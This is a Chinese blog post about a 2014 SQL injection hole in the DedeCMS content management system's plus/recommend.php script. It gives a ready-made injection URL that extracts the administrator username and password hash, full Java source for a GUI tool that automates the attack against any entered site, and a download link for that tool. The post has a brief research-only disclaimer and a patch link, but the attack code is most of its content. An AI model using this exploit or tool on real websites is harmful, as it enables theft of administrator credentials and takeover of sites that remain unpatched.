首页渗透测试 正文

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

2022-03-20 814 0条评论

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。



近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

EXP:


EXP:



复制代码代码如下:


http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111



直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示






利用工具源码(by 园长):



复制代码代码如下:


package org.javaweb.dede.ui;


import java.awt.Toolkit;

import java.io.BufferedReader;

import java.io.InputStreamReader;

import java.net.URL;

import java.util.regex.Matcher;

import java.util.regex.Pattern;


/**

*

* @author yz

*/

public class MainFrame extends javax.swing.JFrame {


private static final long serialVersionUID = 1L;


/**

* Creates new form MainFrame

*/

public MainFrame() {

initComponents();

}


public String request(String url){

String str = "",tmp;

try {

BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));

while((tmp=br.readLine())!=null){

str+=tmp+"\r\n";

}

} catch (Exception e) {

jTextArea1.setText(e.toString());

}

return str;

}


private void initComponents() {


jPanel1 = new javax.swing.JPanel();

jLabel1 = new javax.swing.JLabel();

jTextField1 = new javax.swing.JTextField();

jButton1 = new javax.swing.JButton();

jScrollPane1 = new javax.swing.JScrollPane();

jTextArea1 = new javax.swing.JTextArea();


setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);


jLabel1.setText("URL:");

jTextField1.setText("<a href="http://localhost">http://localhost</a>");


this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");


int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;

int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;

this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);


jButton1.setText("获取");

jButton1.addActionListener(new java.awt.event.ActionListener() {

public void actionPerformed(java.awt.event.ActionEvent evt) {

jButton1ActionPerformed(evt);

}

});


jTextArea1.setColumns(20);

jTextArea1.setRows(5);

jScrollPane1.setViewportView(jTextArea1);


javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);

jPanel1.setLayout(jPanel1Layout);

jPanel1Layout.setHorizontalGroup(

jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(jPanel1Layout.createSequentialGroup()

.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)

.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()

.addContainerGap()

.addComponent(jLabel1)

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))

.addGap(0, 0, Short.MAX_VALUE))

);

jPanel1Layout.setVerticalGroup(

jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addGroup(jPanel1Layout.createSequentialGroup()

.addContainerGap()

.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)

.addComponent(jLabel1)

.addComponent(jTextField1,

javax.swing.GroupLayout.PREFERRED_SIZE,

javax.swing.GroupLayout.DEFAULT_SIZE,

javax.swing.GroupLayout.PREFERRED_SIZE)

.addComponent(jButton1))

.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)

.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))

);


javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());

getContentPane().setLayout(layout);

layout.setHorizontalGroup(

layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)

);

layout.setVerticalGroup(

layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)

.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)

);


pack();

}// </editor-fold>


private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {

String url = jTextField1.getText();

if(null==url||"".equals(url)){

return ;

}

String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");

Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);

if(m.find()){

String[] s = m.group(1).split("\\|");

if(s.length>2){

jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));

}

}

}


public static void main(String args[]) {

java.awt.EventQueue.invokeLater(new Runnable() {

public void run() {

new MainFrame().setVisible(true);

}

});

}


// Variables declaration - do not modify

private javax.swing.JButton jButton1;

private javax.swing.JLabel jLabel1;

private javax.swing.JPanel jPanel1;

private javax.swing.JScrollPane jScrollPane1;

private javax.swing.JTextArea jTextArea1;

private javax.swing.JTextField jTextField1;

// End of variables declaration

}



利用工具下载地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)




dedecms官方补丁地址: http://www.dedecms.com/pl/


文章版权及转载声明

本文作者:符文浩 网址:http://blog.fuwenhao.com/post/532.html 发布于 2022-03-20
文章转载或复制请以超链接形式并注明出处。

发表评论

快捷回复:

评论列表 (暂无评论,814人围观)参与讨论

还没有评论,来说两句吧...

取消
微信二维码
微信二维码
支付宝二维码